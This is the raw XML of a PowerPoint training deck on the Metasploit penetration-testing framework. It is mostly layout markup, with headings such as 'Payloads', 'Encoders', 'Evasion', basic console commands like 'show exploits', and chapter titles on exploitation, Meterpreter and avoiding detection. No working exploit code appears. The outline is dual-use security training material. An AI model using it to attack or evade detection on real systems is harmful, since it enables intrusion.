                                          <p:spTgt spid="7">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>fillcolor</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:by>
                                        <p:hsl h="0" s="12549" l="25098"/>
                                      </p:by>
                                    </p:animClr>
                                    <p:animClr clrSpc="hsl" dir="cw">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>stroke.color</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:by>
                                        <p:hsl h="0" s="12549" l="25098"/>
                                      </p:by>
                                    </p:animClr>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7">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7">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.color</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:by>
                                        <p:hsl h="0" s="12549" l="25098"/>
                                      </p:by>
                                    </p:animClr>
                                    <p:animClr clrSpc="hsl" dir="cw">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>fillcolor</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:by>
                                        <p:hsl h="0" s="12549" l="25098"/>
                                      </p:by>
                                    </p:animClr>
                                    <p:animClr clrSpc="hsl" dir="cw">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>stroke.color</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:by>
                                        <p:hsl h="0" s="12549" l="25098"/>
                                      </p:by>
                                    </p:animClr>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>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7">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.color</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:by>
                                        <p:hsl h="0" s="12549" l="25098"/>
                                      </p:by>
                                    </p:animClr>
                                    <p:animClr clrSpc="hsl" dir="cw">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>fillcolor</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:by>
                                        <p:hsl h="0" s="12549" l="25098"/>
                                      </p:by>
                                    </p:animClr>
                                    <p:animClr clrSpc="hsl" dir="cw">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>stroke.color</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:by>
                                        <p:hsl h="0" s="12549" l="25098"/>
                                      </p:by>
                                    </p:animClr>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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C416CE-F0A8-60EF-7123-F8F150CD77A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="116167" y="93962"/>
            <a:ext cx="11966975" cy="941082"/>
            <a:chOff x="5178684" y="4078025"/>
            <a:chExt cx="1807958" cy="941082"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="Arrow: Chevron 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C845565-F77A-A9EC-79FA-CC6CAD06C3B0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5178684" y="4078025"/>
              <a:ext cx="1807958" cy="941082"/>
            </a:xfrm>
            <a:prstGeom prst="chevron">
              <a:avLst>
                <a:gd name="adj" fmla="val 25000"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent4"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solid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D2C7B812-558B-3717-4464-60D0A94E0DF7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5413955"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4400" b="1" i="1" u="sng" kern="1200" dirty="0">
                  <a:effectLst>
                    <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                      <a:schemeClr val="tx1">
                        <a:alpha val="50000"/>
                      </a:schemeClr>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>Payloads</a:t>
              </a:r>
              <a:endParaRPr lang="ru-RU" sz="4400" b="1" i="1" u="sng" kern="1200" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="tx1">
                      <a:alpha val="50000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mj-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3093293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8C06DD-DE67-A328-5893-129511E2D2F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="106837" y="65969"/>
            <a:ext cx="11976306" cy="941082"/>
            <a:chOff x="6873645" y="4078025"/>
            <a:chExt cx="1807958" cy="941082"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="Arrow: Chevron 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56F80B3D-B46D-58D4-C609-BD253990D736}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6873645" y="4078025"/>
              <a:ext cx="1807958" cy="941082"/>
            </a:xfrm>
            <a:prstGeom prst="chevron">
              <a:avLst>
                <a:gd name="adj" fmla="val 25000"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent5"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solid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A59C2803-DA29-7799-A5C6-04B781368072}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7108916"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4400" b="1" i="1" u="sng" kern="1200" dirty="0">
                  <a:effectLst>
                    <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                      <a:schemeClr val="tx1">
                        <a:alpha val="50000"/>
                      </a:schemeClr>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>Encoders</a:t>
              </a:r>
              <a:endParaRPr lang="ru-RU" sz="4400" b="1" i="1" u="sng" kern="1200" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="tx1">
                      <a:alpha val="50000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mj-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30836517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87CC34-486D-93C6-9307-612FB81C0D23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="116167" y="93961"/>
            <a:ext cx="11882999" cy="941082"/>
            <a:chOff x="8591205" y="4078025"/>
            <a:chExt cx="1807958" cy="941082"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="Arrow: Chevron 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4FC4F828-211E-98D9-5536-9540418F0FDF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8591205" y="4078025"/>
              <a:ext cx="1807958" cy="941082"/>
            </a:xfrm>
            <a:prstGeom prst="chevron">
              <a:avLst>
                <a:gd name="adj" fmla="val 2500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04F90353-3BA1-AD1B-D8EA-F30D5EC5201C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8826476"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00" tIns="648000" rIns="288000" bIns="152400" numCol="1" spcCol="1270" anchor="t" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="533400">
                <a:lnSpc>
                  <a:spcPts val="1500"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="666666"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="4400" b="1" i="1" u="sng" kern="1200" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="666666"/>
                  </a:solidFill>
                  <a:effectLst>
                    <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                      <a:srgbClr val="000000">
                        <a:alpha val="43137"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>Nops</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3613021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43E40A-281F-BF1C-8B16-BC024EF38261}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="97506" y="75300"/>
            <a:ext cx="12004297" cy="941082"/>
            <a:chOff x="10308766" y="4078025"/>
            <a:chExt cx="1807958" cy="941082"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="Arrow: Chevron 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F12C913-773A-764E-9966-9E82558C458B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10308766" y="4078025"/>
              <a:ext cx="1807958" cy="941082"/>
            </a:xfrm>
            <a:prstGeom prst="chevron">
              <a:avLst>
                <a:gd name="adj" fmla="val 2500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D6F23DB9-5D02-F1D4-157A-5B4B2FA7FC39}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10544037" y="4078025"/>
              <a:ext cx="1337417" cy="941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00" tIns="648000" rIns="288000" bIns="228600" numCol="1" spcCol="1270" anchor="t" anchorCtr="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="533400">
                <a:lnSpc>
                  <a:spcPts val="1500"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="4400" b="1" i="1" u="sng" kern="1200" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="666666"/>
                  </a:solidFill>
                  <a:effectLst>
                    <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                      <a:srgbClr val="000000">
                        <a:alpha val="43137"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>Evasion</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2200109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10F4BC-2CB2-1C03-3F85-DE9448A855A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3047238" y="610546"/>
            <a:ext cx="6094476" cy="383695"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="533400">
              <a:lnSpc>
                <a:spcPts val="1500"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" i="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Basics Commands </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{338AF482-8A99-030B-8AE1-7E4C77575F79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="240124" y="1150341"/>
            <a:ext cx="14393418" cy="1079591"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" defTabSz="533400">
              <a:lnSpc>
                <a:spcPts val="1500"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Show                 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Ex : show exploits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" defTabSz="533400">
              <a:lnSpc>
                <a:spcPts val="1500"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFC000"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" defTabSz="533400">
              <a:lnSpc>
                <a:spcPts val="1500"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Search              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Ex : search blue </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" defTabSz="533400">
              <a:lnSpc>
                <a:spcPts val="1500"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" kern="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFC000"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" defTabSz="533400">
              <a:lnSpc>
                <a:spcPts val="1500"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" kern="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFC000"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1457244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5048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1846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0597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914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215920"/>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1756</TotalTime>
  <Words>6522</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>768</Paragraphs>
  <Slides>106</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106</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="121" baseType="lpstr">
      <vt:lpstr>Agency FB</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Arial Nova</vt:lpstr>
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>Bahnschrift Light Condensed</vt:lpstr>
      <vt:lpstr>Biome</vt:lpstr>
      <vt:lpstr>Biome Light</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Rockwell</vt:lpstr>
      <vt:lpstr>Segoe UI</vt:lpstr>
      <vt:lpstr>Tahoma</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>METASPLOIT </vt:lpstr>
      <vt:lpstr>Installation material</vt:lpstr>
      <vt:lpstr>Introduction</vt:lpstr>
      <vt:lpstr>HOW IT RUN …. </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Different Metasploit interfaces</vt:lpstr>
      <vt:lpstr>The Difference between  </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>What’s in the Course ?</vt:lpstr>
      <vt:lpstr>What’s in the Course ?</vt:lpstr>
      <vt:lpstr>Chapter 1  B A S I C S   O F P E N E T R A T I O N  T E S T I N G </vt:lpstr>
      <vt:lpstr>      Chapter 2 M E T A S P L O I T   B A S I C S</vt:lpstr>
      <vt:lpstr>Chapter 3 I N T E L L I G E N C E  G A T H E R I N G</vt:lpstr>
      <vt:lpstr>Active   ( Per To Per )</vt:lpstr>
      <vt:lpstr>Metasploit Utilities  Having covered Metasploit’s three main interfaces, it’s time to cover a few  utilities. Metasploit’s utilities are direct interfaces to particular features  </vt:lpstr>
      <vt:lpstr>Working with Databases in Metasploit</vt:lpstr>
      <vt:lpstr>Importing Nmap Examples</vt:lpstr>
      <vt:lpstr>Importing Nmap Results into Metasploit</vt:lpstr>
      <vt:lpstr>Chapter 4 V U L N E R A B I L I T Y  S C A N N I N G</vt:lpstr>
      <vt:lpstr>Configured Microsoft SQL Servers </vt:lpstr>
      <vt:lpstr>Scanning for Open X11 Servers </vt:lpstr>
      <vt:lpstr>Chapter 5 ENJOY OF  E X P L O I T A T I O N</vt:lpstr>
      <vt:lpstr>Manage It </vt:lpstr>
      <vt:lpstr>Manage It In Windows  </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Metasploit Extensions</vt:lpstr>
      <vt:lpstr>Metasploit Extensions</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Chapter 6 METERPRETER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7 A V O I D I N G  D E T E C T I O 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vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>6-Item Hexagonal Diagram Slide Template</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>You can Ask Me ON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METASPLOIT </dc:title>
  <dc:creator>lancerf998@gmail.com</dc:creator>
  <cp:lastModifiedBy>Mina magdy 2</cp:lastModifiedBy>
  <cp:revision>38</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-07-25T19:00:24Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-02-21T09:56:30Z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